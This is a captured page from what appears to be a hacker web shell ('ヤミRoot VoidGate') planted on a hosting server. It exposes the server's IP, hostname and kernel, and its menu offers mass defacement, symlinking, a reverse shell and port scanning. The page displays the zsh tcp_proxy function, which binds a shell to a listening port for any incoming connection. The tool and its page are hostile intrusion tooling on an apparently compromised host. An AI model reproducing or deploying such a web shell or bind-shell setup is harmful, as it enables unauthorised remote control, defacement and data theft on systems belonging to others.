ヤミRoot VoidGate
User / IP
:
216.73.216.49
Host / Server
:
146.88.233.70 / www.dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
usr
/
share
/
zsh
/
5.0.2
/
functions
/
Viewing: tcp_proxy
# Listen on the given port and for every connection, start a new # command (defaults to $SHELL) in the background on the accepted fd. # WARNING: this can leave your host open to the universe. For use # in a restricted fashion on a secure network. # # Remote logins are much more efficient... local TCP_LISTEN_FD trap '[[ -n $TCP_LISTEN_FD ]] && ztcp -c $TCP_LISTEN_FD; return 1' \ HUP INT TERM EXIT PIPE if [[ $1 != <-> ]]; then print "Usage: $0 port [cmd args... ]" >&2 return 1 fi integer port=$1 shift ztcp -l $port || return 1 TCP_LISTEN_FD=$REPLY (( $# )) || set -- ${SHELL:-zsh} local cmd=$1 shift while ztcp -a $TCP_LISTEN_FD; do # hack to expand aliases without screwing up arguments eval $cmd '$* <&$REPLY >&$REPLY 2>&$REPLY &' # Close the session fd; we don't need it here any more. ztcp -c $REPLY done
Coded With 💗 by
0x6ick